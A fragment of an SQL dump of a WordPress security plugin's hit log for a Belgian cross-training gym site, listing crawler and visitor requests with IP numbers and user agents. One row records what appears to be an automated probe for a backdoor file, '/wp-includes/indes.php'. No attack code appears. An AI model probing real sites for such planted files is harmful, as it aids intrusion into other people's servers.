(73140, 1495227835.516642, 1374841142, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_0 like Mac OS X) AppleWebKit/602.1.38 (KHTML, like Gecko) Version/10.0 Mobile/14A300 Safari/602.1'),
(73141, 1495227835.973197, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.2.5 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(73142, 1495227836.397015, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.2.5 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(73143, 1495227836.831274, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.2.5 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(73144, 1495227837.379081, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.2.5 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(73145, 1495227837.856229, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.2.5 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(73146, 1495227838.306799, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.2.5 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(73147, 1495228695.650437, 1123635091, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/lequipe/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(73148, 1495228700.027306, 1123635091, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-namur/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(73149, 1495231551.461217, 3024883609, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)'),
(73150, 1495238765.814547, 2733899714, 0, 0, 0, 0, 1, 'http://crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; MJ12bot/v1.4.7; http://www.majestic12.co.uk/bot.php?+)'),
(73151, 1495239510.746234, 1123635091, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-namur/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(73152, 1495247410.674940, 1123635091, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/lequipe/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(73153, 1495253800.087943, 1123635091, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(73154, 1495254378.026489, 1123635091, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/lequipe/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(73155, 1495257586.909197, 3652617387, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/lequipe/feed/', '', 'Mozilla/5.0 (compatible; AhrefsBot/5.2; +http://ahrefs.com/robot/)'),
(73156, 1495259966.584620, 632825899, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_1 like Mac OS X) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.0 Mobile/14E304 Safari/602.1'),
(73157, 1495259985.870350, 632825899, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73158, 1495259986.422664, 632825899, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73159, 1495259986.898638, 632825899, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73160, 1495259987.471610, 632825899, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73161, 1495259988.026755, 632825899, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73162, 1495259988.465160, 632825899, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73163, 1495259988.917435, 632825899, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73164, 1495259990.323914, 632825899, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73165, 1495259990.773017, 632825899, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73166, 1495260706.290444, 1374841142, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/603.2.5 (KHTML, like Gecko)'),
(73167, 1495260706.735394, 1374841142, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.2.5 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(73168, 1495260707.142280, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.2.5 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(73169, 1495260707.550581, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.2.5 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)');
INSERT INTO `wp_wfHits` (`id`, `ctime`, `IP`, `jsRun`, `is404`, `isGoogle`, `userID`, `newVisit`, `URL`, `referer`, `UA`) VALUES
(73170, 1495260708.499921, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.2.5 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(73171, 1495260709.235473, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.2.5 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(73172, 1495260709.679276, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.2.5 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(73173, 1495260710.130304, 1374841142, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_0 like Mac OS X) AppleWebKit/602.1.38 (KHTML, like Gecko) Version/10.0 Mobile/14A300 Safari/602.1'),
(73174, 1495260710.615128, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.2.5 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(73175, 1495260711.129094, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.2.5 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(73176, 1495260711.642243, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.2.5 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(73177, 1495260712.328094, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.2.5 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(73178, 1495260712.914327, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.2.5 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(73179, 1495260713.548978, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.2.5 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(73180, 1495265838.396833, 1374841142, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/603.2.5 (KHTML, like Gecko)'),
(73181, 1495265839.089240, 1374841142, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.2.5 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(73182, 1495265839.517480, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.2.5 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(73183, 1495265839.951047, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.2.5 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(73184, 1495265840.488345, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.2.5 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(73185, 1495265840.918356, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.2.5 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(73186, 1495265841.385306, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.2.5 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(73187, 1495265841.849434, 1374841142, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_0 like Mac OS X) AppleWebKit/602.1.38 (KHTML, like Gecko) Version/10.0 Mobile/14A300 Safari/602.1'),
(73188, 1495265842.307474, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.2.5 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(73189, 1495265842.797462, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.2.5 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(73190, 1495265843.203632, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.2.5 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(73191, 1495265843.689496, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.2.5 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(73192, 1495265844.130711, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.2.5 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(73193, 1495265844.551899, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.2.5 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(73194, 1495268418.821964, 1123635016, 0, 0, 1, 0, 1, 'http://crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(73195, 1495268420.024130, 1123635091, 0, 0, 1, 0, 0, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(73196, 1495269011.970364, 3154448177, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_1 like Mac OS X) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.0 Mobile/14E304 Safari/602.1'),
(73197, 1495269012.553130, 3154448177, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73198, 1495269013.084942, 3154448177, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73199, 1495269013.597755, 3154448177, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73200, 1495269014.062562, 3154448177, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73201, 1495269014.701714, 3154448177, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73202, 1495269015.247158, 3154448177, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73203, 1495269015.717877, 3154448177, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73204, 1495269016.179701, 3154448177, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73205, 1495269016.656358, 3154448177, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73206, 1495269017.124699, 3154448177, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73207, 1495269568.751320, 3154448177, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_1 like Mac OS X) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.0 Mobile/14E304 Safari/602.1'),
(73208, 1495269569.334491, 3154448177, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73209, 1495269569.810637, 3154448177, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73210, 1495269570.282621, 3154448177, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73211, 1495269570.776344, 3154448177, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73212, 1495269571.258745, 3154448177, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73213, 1495269571.840633, 3154448177, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73214, 1495269572.320015, 3154448177, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73215, 1495269572.812583, 3154448177, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73216, 1495269573.278413, 3154448177, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73217, 1495269573.731573, 3154448177, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73218, 1495269852.457339, 3154448177, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_1 like Mac OS X) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.0 Mobile/14E304 Safari/602.1'),
(73219, 1495269853.032213, 3154448177, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73220, 1495269853.484582, 3154448177, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73221, 1495269853.945604, 3154448177, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73222, 1495269854.396266, 3154448177, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73223, 1495269854.840994, 3154448177, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73224, 1495269855.412895, 3154448177, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73225, 1495269855.869270, 3154448177, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73226, 1495269856.337717, 3154448177, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73227, 1495269856.788748, 3154448177, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73228, 1495269857.243900, 3154448177, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73229, 1495274406.228382, 3652617288, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/le-cross-training/', '', 'Mozilla/5.0 (compatible; AhrefsBot/5.2; +http://ahrefs.com/robot/)'),
(73230, 1495275730.540353, 1123635091, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-namur/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(73231, 1495276932.009511, 1123635091, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(73232, 1495280647.054954, 1374841142, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/603.2.5 (KHTML, like Gecko)'),
(73233, 1495280649.030527, 1374841142, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.2.5 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(73234, 1495280649.513905, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.2.5 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(73235, 1495280649.952445, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.2.5 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(73236, 1495280650.457814, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.2.5 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(73237, 1495280650.884889, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.2.5 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(73238, 1495280651.330912, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.2.5 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(73239, 1495280651.869516, 1374841142, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_0 like Mac OS X) AppleWebKit/602.1.38 (KHTML, like Gecko) Version/10.0 Mobile/14A300 Safari/602.1'),
(73240, 1495280652.356800, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.2.5 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(73241, 1495280652.892207, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.2.5 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(73242, 1495280653.397920, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.2.5 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(73243, 1495280654.008983, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.2.5 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(73244, 1495280654.509677, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.2.5 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(73245, 1495280655.000005, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.2.5 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(73246, 1495281513.573152, 1123635091, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(73247, 1495286732.480948, 1123635091, 0, 0, 1, 0, 0, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(73248, 1495289781.835366, 1123635091, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/lequipe/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(73249, 1495294440.114742, 3039911297, 0, 1, 0, 0, 1, 'http://crosstrainingcenter.be/wp-includes/indes.php', 'http://crosstrainingcenter.be/wp-includes/indes.php', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)'),
(73250, 1495297414.251645, 1123635091, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(73251, 1495299532.660071, 1123635091, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(73252, 1495306906.695319, 1837876689, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'http://www.google.be/', 'Mozilla/5.0 (Linux; Android 6.0.1; SM-G928F Build/MMB29K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.83 Mobile Safari/537.36'),
(73253, 1495306909.007491, 1837876689, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Linux; Android 6.0.1; SM-G928F Build/MMB29K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.83 Mobile Safari/537.36'),
(73254, 1495306915.594839, 1837876689, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/en-images/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Linux; Android 6.0.1; SM-G928F Build/MMB29K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.83 Mobile Safari/537.36'),
(73255, 1495307441.708633, 1374769563, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_1 like Mac OS X) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.0 Mobile/14E304 Safari/602.1'),
(73256, 1495307442.213714, 1374769563, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73257, 1495307442.736870, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73258, 1495307443.151561, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73259, 1495307443.566094, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73260, 1495307443.979552, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73261, 1495307444.465651, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73262, 1495307444.899159, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73263, 1495307445.319347, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73264, 1495307445.829657, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
